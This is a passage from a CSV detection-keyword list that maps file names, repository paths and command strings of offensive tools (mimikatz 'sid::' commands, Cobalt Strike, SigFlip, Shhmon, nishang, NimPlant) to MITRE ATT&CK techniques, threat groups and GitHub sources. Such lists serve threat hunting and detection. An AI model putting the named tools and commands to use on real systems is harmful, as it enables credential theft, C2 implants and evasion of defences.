TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*sherlock.ps1*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*Sherlock_Vulns.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Shhmon.csproj*,offensive_tool_keyword,shhmon,Neutering Sysmon via driver unload,T1518.001 ,TA0007,N/A,N/A,Defense 
Evasion,https://github.com/matterpreter/Shhmon,1,1,N/A,N/A,3,210,35,2022-10-13T16:56:41Z,2019-09-12T14:13:19Z -*Shhmon.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*Shhmon.exe*,offensive_tool_keyword,shhmon,Neutering Sysmon via driver unload,T1518.001 ,TA0007,N/A,N/A,Defense Evasion,https://github.com/matterpreter/Shhmon,1,1,N/A,N/A,3,210,35,2022-10-13T16:56:41Z,2019-09-12T14:13:19Z -*Shhmon.git*,offensive_tool_keyword,shhmon,Neutering Sysmon via driver unload,T1518.001 ,TA0007,N/A,N/A,Defense Evasion,https://github.com/matterpreter/Shhmon,1,1,N/A,N/A,3,210,35,2022-10-13T16:56:41Z,2019-09-12T14:13:19Z -*shinject *,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,0,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*shinject.nim*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*shinject_ex *,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - 
T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*shocknawe.py*,offensive_tool_keyword,whiskeysamlandfriends,GoldenSAML Attack Libraries and Framework,T1606.002,TA0006,N/A,N/A,Credential Access,https://github.com/secureworks/whiskeysamlandfriends,1,1,N/A,N/A,1,54,11,2021-11-05T21:59:51Z,2021-11-04T15:30:12Z -*Shodan.io*,offensive_tool_keyword,shodan.io,Shodan is the worlds first search engine for Internet-connected devices.,T1016 - T1597 - T1526 - T1046 - T1087 - T1078 - T1056 - T1018 - T1016 - T1583 - T1589,TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Information Gathering,https://www.shodan.io/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*shodanp.py*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*ShorSec/DavRelayUp*,offensive_tool_keyword,DavRelayUp,DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced,T1078 - T1078.004 - T1068,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/ShorSec/DavRelayUp,1,1,N/A,9,5,446,70,2023-06-05T09:17:06Z,2023-06-05T07:49:39Z -*ShorSec/DllNotificationInjection*,offensive_tool_keyword,DllNotificationInjection,A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.,T1055.011 - T1055.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/ShorSec/DllNotificationInjection,1,1,N/A,10,4,319,56,2023-08-23T13:50:27Z,2023-08-14T11:22:30Z -*ShorSec/ShadowSpray*,offensive_tool_keyword,ShadowSpray,A tool to spray Shadow Credentials across an entire domain in 
hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.,T1110.003 - T1098 - T1059 - T1075,TA0001 - TA0008 - TA0009,N/A,N/A,Discovery,https://github.com/ShorSec/ShadowSpray,1,1,N/A,7,5,408,72,2022-10-14T13:36:51Z,2022-10-10T08:34:07Z -*Show-TargetScreen.ps1*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*shred --remove*,greyware_tool_keyword,shred,Malware or other files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.,T1070.004 - T1564.001 - T1027,TA0005 - TA0040 - TA0011,N/A,N/A,Defense Evasion,https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_file_deletion_via_shred.toml,1,0,greyware tool - risks of False positive !,N/A,10,1611,397,2023-10-03T22:19:32Z,2020-06-17T21:48:18Z -*shred -u*,greyware_tool_keyword,shred,Malware or other files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. 
Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.,T1070.004 - T1564.001 - T1027,TA0005 - TA0040 - TA0011,N/A,N/A,Defense Evasion,https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_file_deletion_via_shred.toml,1,0,greyware tool - risks of False positive !,N/A,10,1611,397,2023-10-03T22:19:32Z,2020-06-17T21:48:18Z -*shred -z*,greyware_tool_keyword,shred,Malware or other files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.,T1070.004 - T1564.001 - T1027,TA0005 - TA0040 - TA0011,N/A,N/A,Defense Evasion,https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_file_deletion_via_shred.toml,1,0,greyware tool - risks of False positive !,N/A,10,1611,397,2023-10-03T22:19:32Z,2020-06-17T21:48:18Z -*shred --zero*,greyware_tool_keyword,shred,Malware or other files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. 
Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.,T1070.004 - T1564.001 - T1027,TA0005 - TA0040 - TA0011,N/A,N/A,Defense Evasion,https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_file_deletion_via_shred.toml,1,0,greyware tool - risks of False positive !,N/A,10,1611,397,2023-10-03T22:19:32Z,2020-06-17T21:48:18Z -*shspawn x64 *,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*shspawn x86 *,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - 
T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*shucknt.php*,offensive_tool_keyword,ShuckNT,ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES),T1552.001 - T1555.003 - T1078.003,TA0006 - TA0002 - TA0040,N/A,N/A,Credential Access,https://github.com/yanncam/ShuckNT,1,1,N/A,10,1,36,4,2023-02-02T10:40:59Z,2023-01-27T07:52:47Z -*ShuckNT-main*,offensive_tool_keyword,ShuckNT,ShuckNT is the script of Shuck.sh online service for on-premise use. 
It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES),T1552.001 - T1555.003 - T1078.003,TA0006 - TA0002 - TA0040,N/A,N/A,Credential Access,https://github.com/yanncam/ShuckNT,1,1,N/A,10,1,36,4,2023-02-02T10:40:59Z,2023-01-27T07:52:47Z -*ShutdownRepo/pywhisker*,offensive_tool_keyword,pywhisker,Python version of the C# tool for Shadow Credentials attacks,T1552.001 - T1136 - T1098,TA0003 - TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/ShutdownRepo/pywhisker,1,1,N/A,10,5,418,49,2023-10-03T14:10:17Z,2021-07-21T19:20:00Z -*ShutdownRepo/smartbrute*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*sid::add*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*sid::clear*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*sid::lookup*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*sid::modify*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*sid::patch*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*sid::query*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*sigflip*/Bof/*,offensive_tool_keyword,C2 related tools,SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/med0x2e/SigFlip,1,1,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -*SigFlip.exe -*,offensive_tool_keyword,cobaltstrike,SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/med0x2e/SigFlip,1,0,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -*SigFlip.WinTrustData*,offensive_tool_keyword,cobaltstrike,SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/med0x2e/SigFlip,1,1,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -*SigInject *,offensive_tool_keyword,C2 related tools,SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/med0x2e/SigFlip,1,0,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -*SigInject *.dll*,offensive_tool_keyword,cobaltstrike,SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/med0x2e/SigFlip,1,0,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -*SigLoader *,offensive_tool_keyword,C2 related tools,SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/med0x2e/SigFlip,1,0,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -*Sigloader *.dll*,offensive_tool_keyword,cobaltstrike,SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/med0x2e/SigFlip,1,0,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -*SigLoader.*,offensive_tool_keyword,C2 related tools,SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/med0x2e/SigFlip,1,1,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -*SigLoader/sigloader.c*,offensive_tool_keyword,cobaltstrike,SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/med0x2e/SigFlip,1,1,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -*signal2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential 